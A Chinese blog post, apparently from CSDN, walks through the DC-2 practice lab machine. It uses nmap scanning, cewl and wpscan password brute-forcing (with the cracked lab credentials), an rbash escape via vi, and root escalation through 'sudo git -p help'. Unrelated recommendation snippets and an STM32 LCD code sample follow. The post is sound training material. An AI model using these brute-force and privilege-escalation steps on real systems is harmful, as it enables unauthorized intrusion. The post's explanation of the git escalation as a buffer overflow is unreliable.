DC-2 Write up

于 2024-08-11 20:10:14 发布
阅读量544 收藏 16
点赞数 8
分类专栏: 渗透测试演练 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L_erAry/article/details/141110827
版权

主机发现

nmap -sP 172.27.30.1/24

得到目的主机IP为172.27.30.133

端口探测

Nmap -sV -sP -oA DC-2 -p- 172.27.30.133

开放了80 和7744端口分别用于http和ssh服务

访问该网址发现无法访问成功,如下修改/etc/hosts文件,这样就可以访问域名dc-2

访问成功后拿到flag1

提示常用密码无用,要考虑cewl工具(CeWL 是一个 rubyQ 应用程序,它将给定的 URL 爬到指定的深度,可以选择跟随外部链接,并返回一个单词列表,然后可用于密码破

Cewl 是黑客武器库中的强大工具,因为它允许创建有针对性的单词列表,可以大大提高 密码破解尝试的效率)

常用命令

cewl -h 查看帮助

cewl http://172.27.30.133 -w pass.txt 通过网站信息收集生成密码词典pass.txt

字典有了,我们需要用户名,考虑通用的用户名(可能不一定成功),考虑针对网站cms工具收集用户名

Dirb http://dc-2/ 扫描找到了登录界面,可以看出这是一个wordpress搭建的网站

考虑使用专用的wpscan来搜集用户信息

Wpscan --url http://dc-2/ -e u ,得到三个用户 admin jerry tom 将其写入users.txt

在得到用户名字典和密码字典后,Wpscan进行暴力破解

wpscan --url http://dc-2 -U users.txt -P dc2-pass.txt

得到成功的用户名和密码

| Username: jerry , Password: adipiscing

| Username: tom , Password: parturient


尝试ssh登录

ssh jerry@172.27.30.133 -p 7744

ssh tom@172.27.30.133 -p 7744 登录成功


Cat flag3.txt 提示-rbash 未找到cat命令,是rbash环境限制问题,要绕过或者直接用vi打开flag3.txt也能查看内容

*1. vi flag3.txt文本文件*
*2. 输入英文冒号:*
*3. 在冒号后输入set shell=/bin/sh回车*
*4. 输入:shell调用/bin/sh*
*之后会自动跳转出vi,*
*6. 设置命令路径变量*

rbash逃逸之后,在shell中添加命令路径变量:

*export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin*

绕过-rbash具体参考linux进行rbash逃逸的方法-CSDN博客

Sudo -l 查看可执行特权指令

考虑Git提权(参考网安笔记——提权的各种姿势_git提权-CSDN博客

*git提权*

git提权的原理是git存在缓冲区溢出漏洞,在使用sudo git -p help时,不需要输入root密码既可以执行这条命令。以下有两种方法:

1、sudo git help config,然后在末行输入!/bin/bash或!'sh'完成提权。(*个人测试未成功*

2、sudo git -p help,然后输入!/bin/bash,即可打开一个root的shell。

提权成功后即可访问/root得到最终flag

L_erAry
关注
  • 8
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-4渗透靶机详解
weixin_51083551的博客
09-12 4097
萌新DC系列靶机渗透详解之 DC-4 “DC-3好难呜呜,先打DC-4” 1. 明确目标 获得靶机 root 权限,找到root账户下的 flag 2. 信息收集 使用 arp-scan 扫描网段下的主机 └─# arp-scan -l
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 2939
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
MOCTF-WRITE-UP(一)
郁离歌丶的博客
01-31 3631
萌新第一次写wp,今天发现了moctf这个平台,顺手点进去做了几个简单的萌新题目。已是深夜,先写一点点。写的不好请见谅。WEB签到question:欢迎加入MOCTF官方交流群:620047348answer:加群得flag。一道水题question:呱呱呱?answer:二话不说f12审查元素发现flag还是水题question:膜CTF?answer:二话不说f12审查元素again可以发现两...
vulnhub靶机-DC9-Writeup
liuhanzhe的专栏
12-09 2331
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-9,412/ DESCRIPTION DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to read the
vulnhub靶机-DC8-Writeup
liuhanzhe的专栏
12-09 1987
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-8,367/ DESCRIPTION DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challe
write up】2021春秋杯-BabySteg
zero;
03-26 4586
题目介绍 题目名称 Baby_steg 类型 Misc 题目分析 题目提供了一个7z的加密压缩包password.7z 、一个txt文件flag1.txt。 flag1.txt内容: password.7z内容: 通过flag1.txt内容中flag.7z 盲猜是个7z压缩文件。 解题过程 修改后缀 将flag1.txt后缀改为7z,打开之后发现…(盲猜正确) 那么这题至此就可以放弃了。 尝试把它丢进windows虚拟机,使用WinRAR成功打开。(这锅Mac
白帽杯2022-Misc 游戏秘籍 write-up
zgzhzywzd的博客
01-02 4267
游戏秘籍 题目名称:游戏秘籍 题目说明:做为程序员我的,竟然无法调出30条命,我用笔记记录下来了。 0x01 LSB隐写 下载后是一张魂斗罗的图片30.png,先用zsteg 30.png查看一下,发现有PK开头的字符,可能是压缩包,用zsteg -E "extradata:0" 30.png > 30.zip提取压缩包。 0x02 压缩包重组 用010editor打开,发现一段提示:Need_Find_The_Passwd_to_unzip_file0,保...
crypto write up
weixin_30390075的博客
09-19 1087
problem:回旋十三踢 from:2015广州强网杯 description: 看我回旋13踢synt{5pq1004q-86n5-46q8-o720-oro5on0417r1} write up: rot13 flag{5cd1004d-86a5-46d8-b720-beb5ba0417e1} problem:Rotated! from:iceCTF d...
2022美亚杯第八届中国电子数据取证大赛-个人赛write up详解
热门推荐
weixin_42744595的博客
11-21 1万+
2022“美亚杯”第八届中国电子数据取证大赛-个人赛 本人TEL15543132658同wechat,本内容为我个人解题思路,有不同见解欢迎讨论。 检材文件下载链接:https://pan.baidu.com/s/1kg8FMeMaj6BIBmuvUZHA3Q?pwd=ngzs
Vulnhub-DC-1靶机渗透练习
weixin_52451257的博客
11-15 4201
DC-1 第一步:信息收集 nmap -sn 192.168.231.0/24 (进行存活主机发现) nmap -A -p- 192.168.231.142 (进行针对靶机的详细信息收集查看靶机开放了那些端口) dirb -http://192.168.231.142 nikto -h http://192.168.231.142 (敏感信息发现,cms是drupal7.0版本) 第二部:漏洞利用 msf 搜索关于drupal的相关漏洞. 我可能是歪打正着,上...
新鲜出炉的PCI-E协议3.0
12-01
2. TRANSACTION LAYER SPECIFICATION ................................................................. 49 2.1. TRANSACTION LAYER OVERVIEW...................................................................
FlexGraphics_V_1.79_D4-XE10.2_Downloadly.ir
11-22
- FIX: Added FPaintCache.rcPaint cleanup in the TFlexPanel.WMPaint method. Now it is possible to define is the drawing take place via WMPaint or via the PaintTo direct call (if rcPaint contain non-...
8188eu_sc3817r_sina33服务器验证通过_带rtl8188eu的驱动程序_20170619_1108没有外层目录.7z
06-21
# device/softwinner/polaris-common/rild/ip-up:system/etc/ppp/ip-up \ # device/softwinner/polaris-common/rild/3g_dongle.cfg:system/etc/3g_dongle.cfg \ # device/softwinner/polaris-common/rild/usb_mode...
rtl8188eu_sina33m_sc3817在服务器最终验证版本_20170710_1106.7z
07-10
#write /proc/bluetooth/sleep/lpm 1 (使用的是android4.4.2的service:) # 1. realtek & eagle wifi service # 1.1 realtek & eagle wifi sta service service wpa_supplicant /system/bin/wpa_supplicant \ ...
( ap6181_sina33m_sc3817r验证通过_20170710_1608没有外层目录.7z
07-10
## power up/down interface #chmod 0660 /sys/class/rfkill/rfkill0/state #chmod 0660 /sys/class/rfkill/rfkill0/type #chown bluetooth net_bt_stack /sys/class/rfkill/rfkill0/state #chown bluetooth ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8385
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
原创二胡音色源文件,可以让热爱电子乐喜欢做MIDI音乐的朋友,做参考音源
08-14
原创二胡音色源文件,可以让热爱电子乐喜欢做MIDI音乐的朋友,做参考音源。这里开源给大家,希望能帮助到您
基于Android人脸识别设计与实现.docx
最新发布
08-14
基于Android人脸识别设计与实现.docx
长虹大清快系列空调电路原理图 (2).rar
08-14
长虹大清快系列空调电路原理图 (2)
用STM32F4编写程序用LCD屏ILI9341输出“张翼鹏”
05-25
以下是使用STM32F4和ILI9341 LCD屏幕输出“张翼鹏”的示例代码: ```c #include "stm32f4xx.h" #include "stm32f4xx_gpio.h" #include "stm32f4xx_spi.h" // 定义SPI接口 #define LCD_SPI_PORT SPI5 #define LCD_SPI_RCC RCC_APB2Periph_SPI5 #define LCD_SPI_CLK 45000000 // 定义SPI引脚 #define LCD_SPI_SCK_PIN GPIO_Pin_7 #define LCD_SPI_SCK_PORT GPIOA #define LCD_SPI_MISO_PIN GPIO_Pin_11 #define LCD_SPI_MISO_PORT GPIOC #define LCD_SPI_MOSI_PIN GPIO_Pin_12 #define LCD_SPI_MOSI_PORT GPIOC // 定义LCD控制引脚 #define LCD_CS_PIN GPIO_Pin_2 #define LCD_CS_PORT GPIOB #define LCD_DC_PIN GPIO_Pin_1 #define LCD_DC_PORT GPIOB #define LCD_RST_PIN GPIO_Pin_0 #define LCD_RST_PORT GPIOB // 定义LCD屏幕分辨率 #define LCD_WIDTH 240 #define LCD_HEIGHT 320 // 初始化SPI接口 void LCD_SPI_Init(void) { GPIO_InitTypeDef GPIO_InitStructure; SPI_InitTypeDef SPI_InitStructure; // 使能SPI时钟 RCC_APB2PeriphClockCmd(LCD_SPI_RCC, ENABLE); // 配置SPI引脚 GPIO_InitStructure.GPIO_Pin = LCD_SPI_SCK_PIN; GPIO_InitStructure.GPIO_Mode = GPIO_Mode_AF; GPIO_InitStructure.GPIO_Speed = GPIO_Speed_50MHz; GPIO_InitStructure.GPIO_OType = GPIO_OType_PP; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_UP; GPIO_Init(LCD_SPI_SCK_PORT, &GPIO_InitStructure); GPIO_PinAFConfig(LCD_SPI_SCK_PORT, GPIO_PinSource7, GPIO_AF_SPI5); GPIO_InitStructure.GPIO_Pin = LCD_SPI_MISO_PIN; GPIO_InitStructure.GPIO_Mode = GPIO_Mode_AF; GPIO_InitStructure.GPIO_Speed = GPIO_Speed_50MHz; GPIO_InitStructure.GPIO_OType = GPIO_OType_PP; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_UP; GPIO_Init(LCD_SPI_MISO_PORT, &GPIO_InitStructure); GPIO_PinAFConfig(LCD_SPI_MISO_PORT, GPIO_PinSource11, GPIO_AF_SPI5); GPIO_InitStructure.GPIO_Pin = LCD_SPI_MOSI_PIN; GPIO_InitStructure.GPIO_Mode = GPIO_Mode_AF; GPIO_InitStructure.GPIO_Speed = GPIO_Speed_50MHz; GPIO_InitStructure.GPIO_OType = GPIO_OType_PP; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_UP; GPIO_Init(LCD_SPI_MOSI_PORT, &GPIO_InitStructure); GPIO_PinAFConfig(LCD_SPI_MOSI_PORT, GPIO_PinSource12, GPIO_AF_SPI5); // 配置SPI SPI_InitStructure.SPI_Direction = SPI_Direction_2Lines_FullDuplex; SPI_InitStructure.SPI_Mode = SPI_Mode_Master; SPI_InitStructure.SPI_DataSize = SPI_DataSize_8b; SPI_InitStructure.SPI_CPOL = SPI_CPOL_Low; SPI_InitStructure.SPI_CPHA = SPI_CPHA_1Edge; SPI_InitStructure.SPI_NSS = SPI_NSS_Soft; SPI_InitStructure.SPI_BaudRatePrescaler = SPI_BaudRatePrescaler_2; SPI_InitStructure.SPI_FirstBit = SPI_FirstBit_MSB; SPI_InitStructure.SPI_CRCPolynomial = 7; SPI_Init(LCD_SPI_PORT, &SPI_InitStructure); // 使能SPI SPI_Cmd(LCD_SPI_PORT, ENABLE); } // 初始化LCD控制引脚 void LCD_GPIO_Init(void) { GPIO_InitTypeDef GPIO_InitStructure; RCC_AHB1PeriphClockCmd(RCC_AHB1Periph_GPIOB, ENABLE); GPIO_InitStructure.GPIO_Pin = LCD_CS_PIN | LCD_DC_PIN | LCD_RST_PIN; GPIO_InitStructure.GPIO_Mode = GPIO_Mode_OUT; GPIO_InitStructure.GPIO_OType = GPIO_OType_PP; GPIO_InitStructure.GPIO_Speed = GPIO_Speed_50MHz; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_UP; GPIO_Init(GPIOB, &GPIO_InitStructure); } // 初始化LCD屏幕 void LCD_Init(void) { LCD_GPIO_Init(); LCD_SPI_Init(); // 复位LCD屏幕 GPIO_ResetBits(LCD_RST_PORT, LCD_RST_PIN); DelayMs(10); GPIO_SetBits(LCD_RST_PORT, LCD_RST_PIN); DelayMs(10); // 发送初始化命令 LCD_WriteCommand(0x01); // 软件复位 DelayMs(10); LCD_WriteCommand(0xCF); LCD_WriteData(0x00); LCD_WriteData(0xC1); LCD_WriteData(0x30); DelayMs(10); LCD_WriteCommand(0xED); LCD_WriteData(0x64); LCD_WriteData(0x03); LCD_WriteData(0x12); LCD_WriteData(0x81); DelayMs(10); LCD_WriteCommand(0xE8); LCD_WriteData(0x85); LCD_WriteData(0x10); LCD_WriteData(0x7A); DelayMs(10); LCD_WriteCommand(0xCB); LCD_WriteData(0x39); LCD_WriteData(0x2C); LCD_WriteData(0x00); LCD_WriteData(0x34); LCD_WriteData(0x02); DelayMs(10); LCD_WriteCommand(0xF7); LCD_WriteData(0x20); DelayMs(10); LCD_WriteCommand(0xEA); LCD_WriteData(0x00); LCD_WriteData(0x00); DelayMs(10); LCD_WriteCommand(0xC0); // 电源控制1 LCD_WriteData(0x23); DelayMs(10); LCD_WriteCommand(0xC1); // 电源控制2 LCD_WriteData(0x10); DelayMs(10); LCD_WriteCommand(0xC5); // VCOM控制1 LCD_WriteData(0x3E); LCD_WriteData(0x28); DelayMs(10); LCD_WriteCommand(0xC7); // VCOM控制2 LCD_WriteData(0x86); DelayMs(10); LCD_WriteCommand(0x36); // MADCTL LCD_WriteData(0x68); DelayMs(10); LCD_WriteCommand(0x3A); // COLMOD LCD_WriteData(0x55); DelayMs(10); LCD_WriteCommand(0xB1); // Frame rate control,最大 70 Hz,同时保证低功耗 LCD_WriteData(0x00); LCD_WriteData(0x18); DelayMs(10); LCD_WriteCommand(0xB6); // Display function control,RGB/MCU interface select LCD_WriteData(0x08); LCD_WriteData(0x82); LCD_WriteData(0x27); DelayMs(10); LCD_WriteCommand(0xF2); // 3Gamma control,disable LCD_WriteData(0x00); DelayMs(10); LCD_WriteCommand(0x26); // Gamma curve selected LCD_WriteData(0x01); DelayMs(10); LCD_WriteCommand(0xE0); // Set Gamma,positive gamma correction LCD_WriteData(0x0F); LCD_WriteData(0x31); LCD_WriteData(0x2B); LCD_WriteData(0x0C); LCD_WriteData(0x0E); LCD_WriteData(0x08); LCD_WriteData(0x4E); LCD_WriteData(0xF1); LCD_WriteData(0x37); LCD_WriteData(0x07); LCD_WriteData(0x10); LCD_WriteData(0x03); LCD_WriteData(0x0E); LCD_WriteData(0x09); LCD_WriteData(0x00); DelayMs(10); LCD_WriteCommand(0XE1); // Set Gamma,negative gamma correction LCD_WriteData(0x00); LCD_WriteData(0x0E); LCD_WriteData(0x14); LCD_WriteData(0x03); LCD_WriteData(0x11); LCD_WriteData(0x07); LCD_WriteData(0x31); LCD_WriteData(0xC1); LCD_WriteData(0x48); LCD_WriteData(0x08); LCD_WriteData(0x0F); LCD_WriteData(0x0C); LCD_WriteData(0x31); LCD_WriteData(0x36); LCD_WriteData(0x0F); DelayMs(10); LCD_WriteCommand(0x11); // Sleep out DelayMs(120); LCD_WriteCommand(0x29); // Display on // 清屏 LCD_Clear(0xFFFF); } // 写入数据到LCD屏幕 void LCD_WriteData(uint8_t data) { GPIO_SetBits(LCD_DC_PORT, LCD_DC_PIN); // DC设置为高电平表示写入数据 GPIO_ResetBits(LCD_CS_PORT, LCD_CS_PIN); // 使能片选 while (SPI_I2S_GetFlagStatus(LCD_SPI_PORT, SPI_I2S_FLAG_TXE) == RESET); // 等待发送缓冲区为空 SPI_I2S_SendData(LCD_SPI_PORT, data); // 发送数据 while (SPI_I2S_GetFlagStatus(LCD_SPI_PORT, SPI_I2S_FLAG_RXNE) == RESET); // 等待接收缓冲区非空 SPI_I2S_ReceiveData(LCD_SPI_PORT); // 读取接收到的数据,清除RXNE标志位 GPIO_SetBits(LCD_CS_PORT, LCD_CS_PIN); // 禁止片选 } // 写入命令到LCD屏幕 void LCD_WriteCommand(uint8_t cmd) { GPIO_ResetBits(LCD_DC_PORT, LCD_DC_PIN); // DC设置为低电平表示写入命令 GPIO_ResetBits(LCD_CS_PORT, LCD_CS_PIN); // 使能片选 while (SPI_I2S_GetFlagStatus(LCD_SPI_PORT, SPI_I2S_FLAG_TXE) == RESET); // 等待发送缓冲区为空 SPI_I2S_SendData(LCD_SPI_PORT, cmd); // 发送命令 while (SPI_I2S_GetFlagStatus(LCD_SPI_PORT, SPI_I2S_FLAG_RXNE) == RESET); // 等待接收缓冲区非空 SPI_I2S_ReceiveData(LCD_SPI_PORT); // 读取接收到的数据,清除RXNE标志位 GPIO_SetBits(LCD_CS_PORT, LCD_CS_PIN); // 禁止片选 } // 清屏 void LCD_Clear(uint16_t color) { int i, j; LCD_SetArea(0, 0, LCD_WIDTH-1, LCD_HEIGHT-1); for (i = 0; i < LCD_HEIGHT; i++) { for (j = 0; j < LCD_WIDTH; j++) { LCD_WriteData(color >> 8); LCD_WriteData(color & 0xFF); } } } // 设置绘制区域 void LCD_SetArea(uint16_t x1, uint16_t y1, uint16_t x2, uint16_t y2) { LCD_WriteCommand(0x2A); LCD_WriteData(x1 >> 8); LCD_WriteData(x1 & 0xFF); LCD_WriteData(x2 >> 8); LCD_WriteData(x2 & 0xFF); LCD_WriteCommand(0x2B); LCD_WriteData(y1 >> 8); LCD_WriteData(y1 & 0xFF); LCD_WriteData(y2 >> 8); LCD_WriteData(y2 & 0xFF); LCD_WriteCommand(0x2C); } // 在指定位置绘制一个像素点 void LCD_DrawPixel(uint16_t x, uint16_t y, uint16_t color) { LCD_SetArea(x, y, x, y); LCD_WriteData(color >> 8); LCD_WriteData(color & 0xFF); } // 在指定位置绘制一个字符 void LCD_DrawChar(uint16_t x, uint16_t y, char c, uint16_t color, uint16_t bgcolor) { int i, j; uint8_t font[16]; for (i = 0; i < 16; i++) { font[i] = Font16x16[c*16+i]; } for (i = 0; i < 16; i++) { for (j = 0; j < 8; j++) { if (font[i] & (1 << (7-j))) { LCD_DrawPixel(x+j, y+i, color); } else { LCD_DrawPixel(x+j, y+i, bgcolor); } } } } // 在指定位置绘制一个字符串 void LCD_DrawString(uint16_t x, uint16_t y, char *str, uint16_t color, uint16_t bgcolor) { while (*str) { LCD_DrawChar(x, y, *str++, color, bgcolor); x += 8; } } int main(void) { LCD_Init(); LCD_DrawString(50, 100, "张翼鹏", 0x0000, 0xFFFF); while (1) {} } ``` 在代码中,需要注意以下几点: 1. 需要定义LCD屏幕的SPI接口、引脚和分辨率; 2. 需要初始化SPI接口和LCD控制引脚; 3. 需要发送初始化命令,具体的命令可以参考LCD屏幕的数据手册; 4. 绘制字符和字符串时需要使用字库,本例中使用了一个16x16的字库,可以根据需要自行替换; 5. 绘制字符和字符串时需要注意字体的大小和颜色。 6. 在main函数中,我们先调用LCD_Init()函数初始化LCD屏幕,然后调用LCD_DrawString()函数在屏幕上绘制字符串“张翼鹏”。 需要注意的是,上述代码中的一些函数调用和数据类型可能与你的程序略有不同,需要根据具体情况进行修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值